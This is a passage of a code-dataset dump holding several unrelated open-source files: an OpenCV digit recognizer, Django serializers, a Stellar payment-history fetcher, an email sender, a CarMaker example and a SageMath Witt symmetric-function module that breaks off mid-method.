cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel)\r\n#cv2.imshow('thresholded',thresh)\r\n#find contours in the thresholded image and initialize the digit contour list\r\ncnts = cv2.findContours(thresh.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\ncnts = imutils.grab_contours(cnts)\r\ndigitCnts = []\r\nfor c in cnts:\r\n #bounding box of the contour\r\n (x,y,w,h) = cv2.boundingRect(c)\r\n #if box is in the respective range then it is a digit\r\n if w>=15 and (h>=30 and h<=40):\r\n digitCnts.append(c)\r\n#sort the digit contours from left to right\r\ndigitCnts = contours.sort_contours(digitCnts,method = "left-to-right")[0]\r\ndigits = []\r\n#loop for each digit\r\nfor c in digitCnts:\r\n #set ROI of each digit\r\n (x,y,w,h) = cv2.boundingRect(c)\r\n roi = thresh[y:y+h,x:x+w]\r\n #set dimensions of each digit\r\n (roiH,roiW) = roi.shape\r\n (dW,dH) = (int(roiW*0.25),int(roiH*0.15))\r\n dHC = int(roiH*0.05)\r\n #define the 7-segments\r\n segments = [\r\n ((0,0),(w,dH)), #top\r\n ((0,0),(dW,h//2)), #top-left\r\n ((w - dW,0),(w,h//2)), #top-right\r\n ((0,(h//2)-dHC),(w,(h//2)+dHC)), #center\r\n ((0,h//2),(dW,h)), #bottom-left\r\n ((w-dW,h//2),(w,h)), #bottom-right\r\n ((0,h-dH),(w,h)) #bottom\r\n ]\r\n #look if the segment is on/off\r\n on = [0]*len(segments)\r\n #lookup for each digit in ROI\r\n for (i,((xA,yA),(xB,yB))) in enumerate(segments):\r\n segROI = roi[yA:yB,xA:xB]\r\n total = cv2.countNonZero(segROI)\r\n area = (xB - xA)*(yB - yA)\r\n if total/float(area) > 0.5:\r\n on[i] = 1\r\n digit = DIGITS_LOOKUP[tuple(on)]\r\n digits.append(digit)\r\n cv2.rectangle(output,(x,y),(x+w,y+h),(0,255,0),1)\r\n cv2.putText(output,str(digit),(x - 10,y - 10),cv2.FONT_HERSHEY_SIMPLEX,0.65,(0,255,0),2)\r\n \r\nprint(u"{}{}.{}\u00b0c".format(*digits))\r\ncv2.imshow("INPUT",img)\r\ncv2.imshow("OUTPUT",output)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n\r\n \r\n 
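#note on the lookup above: DIGITS_LOOKUP[tuple(on)] raises a KeyError when a\r\n#segment pattern is misread; a minimal defensive variant (a sketch - the '?'\r\n#placeholder is an assumption, not part of the original script):\r\n#digit = DIGITS_LOOKUP.get(tuple(on), '?')\r\n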
\r\n","repo_name":"ShubhamJagtap2000/OpenCV-Python","sub_path":"DigitRecognitionProject.py","file_name":"DigitRecognitionProject.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"10688379668","text":"from rest_framework import serializers\n\nfrom record.models import Record\n\n\nclass RecordSerializer(serializers.ModelSerializer):\n\n class Meta:\n\n model = Record\n fields = [\"meeting_id\",\"status\"]\nclass RecordDownloadSerializer(serializers.ModelSerializer):\n\n \"\"\"Docstring for RecordDownloadSerializer. \"\"\"\n\n class Meta:\n\n model = Record\n fields = [\"meeting_id\",\"video\"]\n\n\n\nclass RecordSocketSerializer(serializers.Serializer):\n meeting_id = serializers.CharField(max_length=64)\n status = serializers.IntegerField()\n status_message = serializers.CharField(max_length=64)\n\nclass RecordPostSerializer(serializers.Serializer):\n url = serializers.URLField()\nclass RecordRequestSerializer(serializers.Serializer):\n meeting_id = serializers.CharField(max_length=64)\n","repo_name":"odairmario/lassar-api","sub_path":"record/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22037718323","text":"import requests\n\n# address = \"GCORXHCLQ256IPQCWD3RCJXKPYD6BECF2TUKDRRMN6XR6UXP3XK7DYWU\"\n\n\ndef get_transactions_xlm(wallet_address):\n responses = []\n api_url = f'https://horizon.stellar.org/accounts/{wallet_address}/payments?cursor=&limit=100&order=desc'\n response = requests.get(api_url).json()['_embedded']['records']\n for tx in response:\n # print(tx)\n tx_hash = tx['transaction_hash']\n from_address = tx['from']\n to_address = tx['to']\n amount = tx['amount']\n if from_address == wallet_address:\n responses.insert(0, {\"tx\": tx_hash, \"type\": \"OUT\", \"amount\": amount})\n elif to_address == wallet_address:\n responses.insert(0, {\"tx\": tx_hash, \"type\": \"IN\", \"amount\": amount})\n return responses\n\n\n# get_transactions_xlm(wallet_address=address)\n","repo_name":"AminMortezaie/django-tutorial","sub_path":"ExchangeSystem/cosmos-app/transaction_history/get_tx/xlm_get_transaction_history.py","file_name":"xlm_get_transaction_history.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"18964183434","text":"from setuptools import find_packages, setup\n\ndocs_requirements = []\n\ninstallation_requirements = []\n\nsetup_requirements = [\n \"pytest-runner\"\n]\n\ntest_requirements = [\n \"pytest\",\n \"cerberus\",\n]\n\nsetup(\n name='MyPackageName',\n version='1.0.0',\n url='https://github.com/mypackage.git',\n author='Author Name',\n author_email='author@gmail.com',\n description='Description of my package',\n packages=find_packages(), \n install_requires=installation_requirements,\n setup_requires=setup_requirements,\n extras_require={\n 'docs': docs_requirements,\n 'test': test_requirements,\n }\n)\n","repo_name":"elben10/travis2","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71034572279","text":"from pycarmaker import CarMaker, Quantity\nimport time\n\n# 1 - Initialize pyCarMaker\nIP_ADDRESS = \"localhost\"\nPORT = 16660\ncm = CarMaker(IP_ADDRESS, PORT)\n\n# 2 - Connect 
to CarMaker\ncm.connect()\n\n# 3 - Create a Quantity\nqbrake = Quantity(\"DM.Brake\", Quantity.FLOAT)\n\n# 4 - Press the Brake\ncm.DVA_write(qbrake, 1)\n# cm.send(\"DVAReleaseQuants\\r\")\n\n# 5 - wait for 5 seconds\ntime.sleep(5)\n\n# 6 - Release the Brake\ncm.DVA_write(qbrake, 0)\n\n# 7 - Wait for 5 seconds\ntime.sleep(5)\n\n# 8 - Release the DVA\ncm.DVA_release()\n","repo_name":"gmnvh/pycarmaker","sub_path":"examples/Ex04_DVAWrite.py","file_name":"Ex04_DVAWrite.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"40"} +{"seq_id":"28005217100","text":"import abc\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom smtplib import SMTP\n\nfrom loguru import logger\nfrom retry import retry\n\nfrom common.config import settings\nfrom produces import rabbit_producer\n\n\nclass AbstractSender(abc.ABC):\n @abc.abstractmethod\n def send_message(self) -> int:\n pass\n\n\nclass EmailSender(AbstractSender):\n def __init__(self, email: dict, smtp_conn: smtplib.SMTP):\n self.email = email\n self.smtp_conn = smtp_conn\n\n def send_message(self):\n message = MIMEMultipart(\"alternative\")\n message[\"From\"] = \"from@example.com\"\n message[\"To\"] = \",\".join([self.email.get(\"email\")])\n message[\"Subject\"] = self.email.get(\"subject\")\n message.attach(MIMEText(self.email.get(\"text\"), \"plain\"))\n message.attach(MIMEText(self.email.get(\"html\"), \"html\"))\n\n try:\n self.smtp_conn.sendmail(\n message.get(\"From\"),\n message.get(\"To\"),\n message.as_string(),\n )\n logger.info(message.as_string())\n except (smtplib.SMTPRecipientsRefused, smtplib.SMTPSenderRefused) as exc:\n logger.exception(exc)\n rabbit_producer(settings.death_queue, self.email)\n\n\nclass SMTPConnection:\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.conn = self.create_connection()\n\n def test_conn_open(self):\n try:\n status = self.conn.noop()[0]\n except smtplib.SMTPServerDisconnected:\n status = -1\n return True if status == 250 else False\n\n @retry(\n backoff=settings.backoff_factor,\n delay=settings.backoff_start_sleep_time,\n max_delay=settings.backoff_border_sleep_time,\n logger=logger,\n )\n def create_connection(self):\n return SMTP(self.host, self.port)\n","repo_name":"AndreiUkladchikov/YandexPracticumTeam","sub_path":"notification/sender_worker/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70150895480","text":"from . import multiplicative\nfrom sage.matrix.constructor import matrix\n\n\nclass SymmetricFunctionAlgebra_witt(multiplicative.SymmetricFunctionAlgebra_multiplicative):\n r\"\"\"\n The Witt symmetric function basis (or Witt basis, to be short).\n\n The Witt basis of the ring of symmetric functions is\n denoted by `(x_{\\lambda})` in [HazWitt1]_, section 9.63, and by\n `(q_{\\lambda})` in [DoranIV1996]_. We will denote this basis by\n `(w_{\\lambda})` (which is precisely how it is denoted in\n [GriRei18]_, Exercise 2.9.3(d)). It is a multiplicative basis\n (meaning that `w_{\\emptyset} = 1` and that every partition\n `\\lambda` satisfies\n `w_{\\lambda} = w_{\\lambda_1} w_{\\lambda_2} w_{\\lambda_3} \\cdots`,\n where `w_i` means `w_{(i)}` for every nonnegative integer `i`).\n\n This basis can be defined in various ways. Probably the most\n well-known one is using the equation\n\n .. 
MATH::\n\n \\prod_{d=1}^{\\infty} (1 - w_d t^d)^{-1} = \\sum_{n=0}^{\\infty} h_n t^n\n\n where `t` is a formal variable and `h_n` are the complete\n homogeneous symmetric functions, extended to `0` by `h_0 = 1`.\n This equation allows one to uniquely determine the functions\n `w_1, w_2, w_3, \\ldots` by recursion; one consequently extends the\n definition to all `w_{\\lambda}` by requiring multiplicativity.\n\n A way to rewrite the above equation without power series is:\n\n .. MATH::\n\n h_n = \\sum_{\\lambda \\vdash n} w_{\\lambda}\n\n for all nonnegative integers `n`, where `\\lambda \\vdash n` means\n that `\\lambda` is a partition of `n`.\n\n A similar equation (which is easily seen to be equivalent to the\n former) is\n\n .. MATH::\n\n e_n = \\sum_{\\lambda} (-1)^{n - \\ell(\\lambda)} w_{\\lambda},\n\n with the sum running only over *strict* partitions `\\lambda` of\n `n` this time. This equation can also be used to recursively\n define the `w_n`. Furthermore, every positive integer `n`\n satisfies\n\n .. MATH::\n\n p_n = \\sum_{d\\mid n} d w_d^{n/d},\n\n and this can be used to define the `w_n` recursively over any\n ring which is torsion-free as a `\\ZZ`-module. While these\n equations all yield easy formulas for classical bases of the\n ring of symmetric functions in terms of the Witt symmetric\n functions, it seems difficult to obtain explicit formulas in\n the other direction.\n\n The Witt symmetric functions owe their name to the fact that\n the ring of symmetric functions can be viewed as the coordinate\n ring of the group scheme of Witt vectors, and the Witt\n symmetric functions are the functions that send a Witt vector\n to its components (whereas the powersum symmetric functions\n send a Witt vector to its ghost components). Details can be\n found in [HazWitt1]_ or section 3.2 of [BorWi2004]_.\n\n INPUT:\n\n - ``Sym`` -- an instance of the ring of the symmetric functions.\n - ``coerce_h`` -- (default: ``True``) a boolean that determines\n whether the transition maps between the Witt basis and the\n complete homogeneous basis will be cached and registered as\n coercions.\n - ``coerce_e`` -- (default: ``False``) a boolean that determines\n whether the transition maps between the Witt basis and the\n elementary symmetric basis will be cached and registered as\n coercions.\n - ``coerce_p`` -- (default: ``False``) a boolean that determines\n whether the transition maps between the Witt basis and the\n powersum basis will be cached and registered as coercions (or\n conversions, if the base ring is not a `\\QQ`-algebra).\n\n REFERENCES:\n\n .. [HazWitt1] Michiel Hazewinkel. *Witt vectors. Part 1*.\n :arxiv:`0804.3888v1`\n\n .. [DoranIV1996] William F. Doran IV.\n *A Proof of Reutenauer's `-q_{(n)}` Conjecture*.\n Journal of combinatorial theory, Series A 74, pp. 342-344 (1996),\n article no. 0056. :doi:`10.1006/jcta.1996.0056`\n\n .. [BorWi2004] James Borger, Ben Wieland.\n *Plethystic algebra*.\n :arxiv:`math/0407227v1`\n\n .. 
[GriRei18]_\n\n EXAMPLES:\n\n Here are the first few Witt symmetric functions, in various bases::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: w = Sym.w()\n sage: e = Sym.e()\n sage: h = Sym.h()\n sage: p = Sym.p()\n sage: s = Sym.s()\n sage: m = Sym.m()\n\n sage: p(w([1]))\n p[1]\n sage: m(w([1]))\n m[1]\n sage: e(w([1]))\n e[1]\n sage: h(w([1]))\n h[1]\n sage: s(w([1]))\n s[1]\n\n sage: p(w([2]))\n -1/2*p[1, 1] + 1/2*p[2]\n sage: m(w([2]))\n -m[1, 1]\n sage: e(w([2]))\n -e[2]\n sage: h(w([2]))\n -h[1, 1] + h[2]\n sage: s(w([2]))\n -s[1, 1]\n\n sage: p(w([3]))\n -1/3*p[1, 1, 1] + 1/3*p[3]\n sage: m(w([3]))\n -2*m[1, 1, 1] - m[2, 1]\n sage: e(w([3]))\n -e[2, 1] + e[3]\n sage: h(w([3]))\n -h[2, 1] + h[3]\n sage: s(w([3]))\n -s[2, 1]\n\n sage: Sym = SymmetricFunctions(ZZ)\n sage: w = Sym.w()\n sage: e = Sym.e()\n sage: h = Sym.h()\n sage: s = Sym.s()\n sage: m = Sym.m()\n sage: p = Sym.p()\n sage: m(w([4]))\n -9*m[1, 1, 1, 1] - 4*m[2, 1, 1] - 2*m[2, 2] - m[3, 1]\n sage: e(w([4]))\n -e[2, 1, 1] + e[3, 1] - e[4]\n sage: h(w([4]))\n -h[1, 1, 1, 1] + 2*h[2, 1, 1] - h[2, 2] - h[3, 1] + h[4]\n sage: s(w([4]))\n -s[1, 1, 1, 1] - s[2, 1, 1] - s[2, 2] - s[3, 1]\n\n Some examples of conversions the other way::\n\n sage: w(h[3])\n w[1, 1, 1] + w[2, 1] + w[3]\n sage: w(e[3])\n -w[2, 1] + w[3]\n sage: w(m[2,1])\n 2*w[2, 1] - 3*w[3]\n sage: w(p[3])\n w[1, 1, 1] + 3*w[3]\n\n Antipodes::\n\n sage: w([1]).antipode()\n -w[1]\n sage: w([2]).antipode()\n -w[1, 1] - w[2]\n\n The following holds for all odd `i` and is easily proven by\n induction::\n\n sage: all( w([i]).antipode() == -w([i]) for i in range(1, 10, 2) )\n True\n\n The Witt basis does not allow for simple expressions for\n comultiplication and antipode in general (this is related to the\n fact that the sum of two Witt vectors isn't easily described in\n terms of the components). Therefore, most computations with Witt\n symmetric functions, as well as conversions and coercions, pass\n through the complete homogeneous symmetric functions by default.\n However, one can also use the elementary symmetric functions\n instead, or (if the base ring is a `\\QQ`-algebra) the powersum\n symmetric functions. This is what the optional keyword variables\n ``coerce_e``, ``coerce_h`` and ``coerce_p`` are for. These\n variables do not affect the results of the (non-underscored)\n methods of ``self``, but they affect the speed of the computations\n (the more of these variables are set to ``True``, the\n faster these are) and the size of the cache (the more of\n these variables are set to ``True``, the bigger the cache). 
Let us\n check that the results are the same no matter to what the\n variables are set::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: p = Sym.p()\n sage: wh = Sym.w()\n sage: we = Sym.w(coerce_h=False, coerce_e=True)\n sage: wp = Sym.w(coerce_h=False, coerce_p=True)\n sage: all( p(wh(lam)) == p(we(lam)) == p(wp(lam)) for lam in Partitions(4) )\n True\n sage: all ( wh(p(lam)).monomial_coefficients()\n ....: == we(p(lam)).monomial_coefficients()\n ....: == wp(p(lam)).monomial_coefficients() for lam in Partitions(4) )\n True\n\n TESTS:\n\n Let us check that all the above computations work with a\n non-default setting as well::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: w = Sym.w(coerce_h=False, coerce_p=True)\n sage: e = Sym.e()\n sage: h = Sym.h()\n sage: p = Sym.p()\n sage: s = Sym.s()\n sage: m = Sym.m()\n\n sage: p(w([1]))\n p[1]\n sage: m(w([1]))\n m[1]\n sage: e(w([1]))\n e[1]\n sage: h(w([1]))\n h[1]\n sage: s(w([1]))\n s[1]\n\n sage: p(w([2]))\n -1/2*p[1, 1] + 1/2*p[2]\n sage: m(w([2]))\n -m[1, 1]\n sage: e(w([2]))\n -e[2]\n sage: h(w([2]))\n -h[1, 1] + h[2]\n sage: s(w([2]))\n -s[1, 1]\n\n sage: p(w([3]))\n -1/3*p[1, 1, 1] + 1/3*p[3]\n sage: m(w([3]))\n -2*m[1, 1, 1] - m[2, 1]\n sage: e(w([3]))\n -e[2, 1] + e[3]\n sage: h(w([3]))\n -h[2, 1] + h[3]\n sage: s(w([3]))\n -s[2, 1]\n\n sage: Sym = SymmetricFunctions(ZZ)\n sage: w = Sym.w()\n sage: e = Sym.e()\n sage: h = Sym.h()\n sage: s = Sym.s()\n sage: m = Sym.m()\n sage: p = Sym.p()\n sage: m(w([4]))\n -9*m[1, 1, 1, 1] - 4*m[2, 1, 1] - 2*m[2, 2] - m[3, 1]\n sage: e(w([4]))\n -e[2, 1, 1] + e[3, 1] - e[4]\n sage: h(w([4]))\n -h[1, 1, 1, 1] + 2*h[2, 1, 1] - h[2, 2] - h[3, 1] + h[4]\n sage: s(w([4]))\n -s[1, 1, 1, 1] - s[2, 1, 1] - s[2, 2] - s[3, 1]\n\n sage: w(h[3])\n w[1, 1, 1] + w[2, 1] + w[3]\n sage: w(e[3])\n -w[2, 1] + w[3]\n sage: w(m[2,1])\n 2*w[2, 1] - 3*w[3]\n sage: w(p[3])\n w[1, 1, 1] + 3*w[3]\n\n sage: w([1]).antipode()\n -w[1]\n sage: w([2]).antipode()\n -w[1, 1] - w[2]\n sage: all( w([i]).antipode() == -w([i]) for i in range(1, 10, 2) )\n True\n\n Another non-default setting::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: w = Sym.w(coerce_h=False, coerce_e=True)\n sage: e = Sym.e()\n sage: h = Sym.h()\n sage: p = Sym.p()\n sage: s = Sym.s()\n sage: m = Sym.m()\n\n sage: p(w([1]))\n p[1]\n sage: m(w([1]))\n m[1]\n sage: e(w([1]))\n e[1]\n sage: h(w([1]))\n h[1]\n sage: s(w([1]))\n s[1]\n\n sage: p(w([2]))\n -1/2*p[1, 1] + 1/2*p[2]\n sage: m(w([2]))\n -m[1, 1]\n sage: e(w([2]))\n -e[2]\n sage: h(w([2]))\n -h[1, 1] + h[2]\n sage: s(w([2]))\n -s[1, 1]\n\n sage: p(w([3]))\n -1/3*p[1, 1, 1] + 1/3*p[3]\n sage: m(w([3]))\n -2*m[1, 1, 1] - m[2, 1]\n sage: e(w([3]))\n -e[2, 1] + e[3]\n sage: h(w([3]))\n -h[2, 1] + h[3]\n sage: s(w([3]))\n -s[2, 1]\n\n sage: Sym = SymmetricFunctions(ZZ)\n sage: w = Sym.w()\n sage: e = Sym.e()\n sage: h = Sym.h()\n sage: s = Sym.s()\n sage: m = Sym.m()\n sage: p = Sym.p()\n sage: m(w([4]))\n -9*m[1, 1, 1, 1] - 4*m[2, 1, 1] - 2*m[2, 2] - m[3, 1]\n sage: e(w([4]))\n -e[2, 1, 1] + e[3, 1] - e[4]\n sage: h(w([4]))\n -h[1, 1, 1, 1] + 2*h[2, 1, 1] - h[2, 2] - h[3, 1] + h[4]\n sage: s(w([4]))\n -s[1, 1, 1, 1] - s[2, 1, 1] - s[2, 2] - s[3, 1]\n sage: [type(coeff) for a, coeff in h(w([4]))]\n [<class 'sage.rings.integer.Integer'>,\n <class 'sage.rings.integer.Integer'>,\n <class 'sage.rings.integer.Integer'>,\n <class 'sage.rings.integer.Integer'>,\n <class 'sage.rings.integer.Integer'>]\n\n sage: w(h[3])\n w[1, 1, 1] + w[2, 1] + w[3]\n sage: w(e[3])\n -w[2, 1] + w[3]\n sage: w(m[2,1])\n 2*w[2, 1] - 3*w[3]\n sage: w(p[3])\n w[1, 1, 1] + 3*w[3]\n\n sage: w([1]).antipode()\n -w[1]\n sage: w([2]).antipode()\n -w[1, 1] - w[2]\n sage: all( w([i]).antipode() == -w([i]) for i in range(1, 
10, 2) )\n ....: #this holds for all odd i and is easily proven by induction\n True\n \"\"\"\n\n def __init__(self, Sym, coerce_h=True, coerce_e=False, coerce_p=False):\n \"\"\"\n Initialize ``self``.\n\n TESTS::\n\n sage: w = SymmetricFunctions(QQ).w()\n sage: TestSuite(w).run(skip=['_test_associativity', '_test_distributivity', '_test_prod'])\n sage: TestSuite(w).run(elements = [w[1,1]+w[2], w[1]+2*w[1,1]])\n \"\"\"\n self._coerce_h = coerce_h\n self._coerce_e = coerce_e\n self._coerce_p = coerce_p\n multiplicative.SymmetricFunctionAlgebra_multiplicative.__init__(self, Sym, \"Witt\", 'w')\n\n def _precompute_cache(self, n, to_self_cache, from_self_cache, transition_matrices, inverse_transition_matrices, to_self_gen_function):\n \"\"\"\n Compute the transition matrices between ``self`` and another\n multiplicative homogeneous basis in the homogeneous components of\n degree `n`.\n\n The results are not returned, but rather stored in the caches.\n\n This assumes that the transition matrices in all degrees smaller\n than `n` have already been computed and cached!\n\n INPUT:\n\n - ``n`` -- nonnegative integer\n - ``to_self_cache`` -- a cache which stores the coordinates of\n the elements of the other basis with respect to the\n basis ``self``\n - ``from_self_cache`` -- a cache which stores the coordinates\n of the elements of ``self`` with respect to the other\n basis\n - ``transition_matrices`` -- a cache for transition matrices\n which contain the coordinates of the elements of the other\n basis with respect to ``self``\n - ``inverse_transition_matrices`` -- a cache for transition\n matrices which contain the coordinates of the elements of\n ``self`` with respect to the other basis\n - ``to_self_gen_function`` -- a function which takes a\n positive integer `n` and returns the element of the other\n basis corresponding to the partition `[n]` expanded with\n respect to the Witt basis ``self`` (as an element of\n ``self``, not as a dictionary)\n\n Examples for usage of this function are the ``_precompute_h``,\n ``_precompute_e`` and ``_precompute_p`` methods of this class.\n\n EXAMPLES:\n\n The examples below demonstrate how the caches are built\n step by step using the ``_precompute_cache`` method. 
In order\n not to influence the outcome of other doctests, we make sure\n not to use the caches internally used by this class, but\n rather to create new caches::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: w = Sym.w()\n sage: toy_to_self_cache = {}\n sage: toy_from_self_cache = {}\n sage: toy_transition_matrices = {}\n sage: toy_inverse_transition_matrices = {}\n sage: l = lambda c: [ (i[0],[j for j in sorted(i[1].items())]) for i in sorted(c.items())]\n sage: l(toy_to_self_cache)\n []\n sage: def toy_gen_function(n):\n ....: if n > 1:\n ....: return w(Partition([n])) + n * w(Partition([n-1,1]))\n ....: return w(Partition([n]))\n sage: w._precompute_cache(0, toy_to_self_cache,\n ....: toy_from_self_cache,\n ....: toy_transition_matrices,\n ....: toy_inverse_transition_matrices,\n ....: toy_gen_function)\n sage: l(toy_to_self_cache)\n [([], [([], 1)])]\n sage: w._precompute_cache(1, toy_to_self_cache,\n ....: toy_from_self_cache,\n ....: toy_transition_matrices,\n ....: toy_inverse_transition_matrices,\n ....: toy_gen_function)\n sage: l(toy_to_self_cache)\n [([], [([], 1)]), ([1], [([1], 1)])]\n sage: w._precompute_cache(2, toy_to_self_cache,\n ....: toy_from_self_cache,\n ....: toy_transition_matrices,\n ....: toy_inverse_transition_matrices,\n ....: toy_gen_function)\n sage: l(toy_to_self_cache)\n [([], [([], 1)]),\n ([1], [([1], 1)]),\n ([1, 1], [([1, 1], 1)]),\n ([2], [([1, 1], 2), ([2], 1)])]\n sage: toy_transition_matrices[2]\n [1 2]\n [0 1]\n sage: toy_inverse_transition_matrices[2]\n [ 1 -2]\n [ 0 1]\n sage: sorted(toy_transition_matrices)\n [0, 1, 2]\n \"\"\"\n # Much of this code is adapted from dual.py\n base_ring = self.base_ring()\n zero = base_ring.zero()\n\n from sage.combinat.partition import Partition, Partitions_n\n\n # Handle the n == 0 case separately\n if n == 0:\n part = Partition([])\n one = base_ring.one()\n to_self_cache[ part ] = { part: one }\n from_self_cache[ part ] = { part: one }\n transition_matrices[n] = matrix(base_ring, [[one]])\n inverse_transition_matrices[n] = matrix(base_ring, [[one]])\n return\n\n partitions_n = Partitions_n(n).list()\n\n # The other basis will be called B from now on.\n\n # This contains the data for the transition matrix from the\n # basis B to the Witt basis self.\n transition_matrix_n = matrix(base_ring, len(partitions_n), len(partitions_n))\n\n # This first section calculates how the basis elements of the\n # basis B are expressed in terms of the Witt basis ``self``.\n\n # For every partition p of size n, expand B[p] in terms of\n # the Witt basis self using multiplicativity and\n # to_self_gen_function.\n i = 0\n for s_part in partitions_n:\n # s_mcs will be self(B[s_part])._monomial_coefficients\n s_mcs = {}\n\n # We need to compute the coordinates of B[s_part] in the Witt basis.\n hsp_in_w_basis = self.one()\n for p in s_part:\n hsp_in_w_basis *= to_self_gen_function(p)\n # Now, hsp_in_w_basis is B[s_part] expanded in the Witt\n # basis self (this is the same as the coercion self(B[s_part]).\n j = 0\n for p_part in partitions_n:\n\n if p_part in hsp_in_w_basis._monomial_coefficients:\n sp = hsp_in_w_basis._monomial_coefficients[p_part]\n s_mcs[p_part] = sp\n transition_matrix_n[i,j] = sp\n\n j += 1\n\n to_self_cache[ s_part ] = s_mcs\n i += 1\n\n # Save the transition matrix\n transition_matrices[n] = transition_matrix_n\n\n # This second section calculates how the basis elements of\n # self expand in terms of the basis B. 
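# A small worked example of the matrix built above (hedged; the numbers\n # match the h-basis doctests of _precompute_h, n = 2, partitions ordered\n # [2], [1, 1]): h[2] = w[2] + w[1, 1] and h[1, 1] = h[1]*h[1] = w[1, 1],\n # so transition_matrix_n = [[1, 1], [0, 1]], and its inverse\n # [[1, -1], [0, 1]] recovers w[2] = h[2] - h[1, 1].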
We do this by\n # computing the inverse of the matrix transition_matrix_n\n # obtained above.\n # TODO: Possibly this can be sped up by using properties\n # of this matrix (e. g., it being triangular in most standard cases).\n # Are there significantly faster ways to invert a triangular\n # matrix (compared to the usual matrix inversion algorithms)?\n inverse_transition = (~transition_matrix_n).change_ring(base_ring)\n # Note that we don't simply write\n # \"inverse_transition = ~transition_matrix_n\" because that\n # tends to cast the entries of the matrix into a quotient\n # field even if this is unnecessary.\n\n # TODO: This still looks fragile when the base ring is weird!\n # Possibly work over ZZ in this method?\n\n for i in range(len(partitions_n)):\n d_mcs = {}\n for j in range(len(partitions_n)):\n if inverse_transition[i,j] != zero:\n d_mcs[ partitions_n[j] ] = inverse_transition[i,j]\n\n from_self_cache[ partitions_n[i] ] = d_mcs\n\n inverse_transition_matrices[n] = inverse_transition\n\n def _precompute_h(self, n):\n \"\"\"\n Compute the transition matrices between ``self`` and the complete\n homogeneous basis in the homogeneous components of degree `n`\n (and in those of smaller degree, if not already computed).\n The result is not returned, but rather stored in the cache.\n\n This assumes that the ``coerce_h`` keyword has been set to\n ``True`` in the initialization of ``self`` (otherwise the cache\n does not exist).\n\n INPUT:\n\n - ``n`` -- nonnegative integer\n\n EXAMPLES:\n\n The examples below demonstrate how the caches of ``w`` are built\n step by step using the ``_precompute_h`` method. Thus they rely on\n an untouched Witt symmetric basis that hasn't already seen some\n of its cache filled by other computations. We obtain such a basis\n by choosing a ground ring unlikely to appear elsewhere::\n\n sage: Sym = SymmetricFunctions(ZZ['hell', 'yeah'])\n sage: w = Sym.Witt()\n sage: l = lambda c: [ (i[0],[j for j in sorted(i[1].items())]) for i in sorted(c.items())]\n sage: l(w._h_to_self_cache)\n []\n sage: w._precompute_h(0)\n sage: l(w._h_to_self_cache)\n [([], [([], 1)])]\n sage: w._precompute_h(1)\n sage: l(w._h_to_self_cache)\n [([], [([], 1)]), ([1], [([1], 1)])]\n sage: w._precompute_h(2)\n sage: l(w._h_to_self_cache)\n [([], [([], 1)]),\n ([1], [([1], 1)]),\n ([1, 1], [([1, 1], 1)]),\n ([2], [([1, 1], 1), ([2], 1)])]\n sage: w._h_transition_matrices[2]\n [1 1]\n [0 1]\n sage: w._h_inverse_transition_matrices[2]\n [ 1 -1]\n [ 0 1]\n sage: sorted(w._h_transition_matrices)\n [0, 1, 2]\n \"\"\"\n l = len(self._h_transition_matrices)\n if l <= n:\n from sage.combinat.partition import Partitions_n\n from sage.misc.cachefunc import cached_function\n\n @cached_function\n def wsum(m): # expansion of h_m in w-basis, for m > 0\n return self._from_dict({lam: 1 for lam in Partitions_n(m)})\n for i in range(l, n + 1):\n self._precompute_cache(i, self._h_to_self_cache,\n self._h_from_self_cache,\n self._h_transition_matrices,\n self._h_inverse_transition_matrices,\n wsum)\n\n def _precompute_e(self, n):\n \"\"\"\n Compute the transition matrices between ``self`` and the elementary\n symmetric basis in the homogeneous components of degree `n`\n (and in those of smaller degree, if not already computed).\n The result is not returned, but rather stored in the cache.\n\n This assumes that the ``coerce_e`` keyword has been set to\n ``True`` in the initialization of ``self`` (otherwise the cache\n does not exist).\n\n INPUT:\n\n - ``n`` -- nonnegative integer\n\n EXAMPLES:\n\n The 
examples below demonstrate how the caches of ``w`` are built\n step by step using the ``_precompute_e`` method. Thus they rely on\n an untouched Witt symmetric basis that hasn't already seen some\n of its cache filled by other computations. We obtain such a basis\n by choosing a ground ring unlikely to appear elsewhere::\n\n sage: Sym = SymmetricFunctions(ZZ['hell', 'yeah'])\n sage: w = Sym.Witt(coerce_e=True)\n sage: l = lambda c: [ (i[0],[j for j in sorted(i[1].items())]) for i in sorted(c.items())]\n sage: l(w._e_to_self_cache)\n []\n sage: w._precompute_e(0)\n sage: l(w._e_to_self_cache)\n [([], [([], 1)])]\n sage: w._precompute_e(1)\n sage: l(w._e_to_self_cache)\n [([], [([], 1)]), ([1], [([1], 1)])]\n sage: w._precompute_e(2)\n sage: l(w._e_to_self_cache)\n [([], [([], 1)]),\n ([1], [([1], 1)]),\n ([1, 1], [([1, 1], 1)]),\n ([2], [([2], -1)])]\n sage: w._e_transition_matrices[2]\n [-1 0]\n [ 0 1]\n sage: w._e_inverse_transition_matrices[2]\n [-1 0]\n [ 0 1]\n \"\"\"\n l = len(self._e_transition_matrices)\n if l <= n:\n from sage.combinat.partition import Partitions\n from sage.misc.cachefunc import cached_function\n\n @cached_function\n def wsum_e(m): # expansion of e_m in 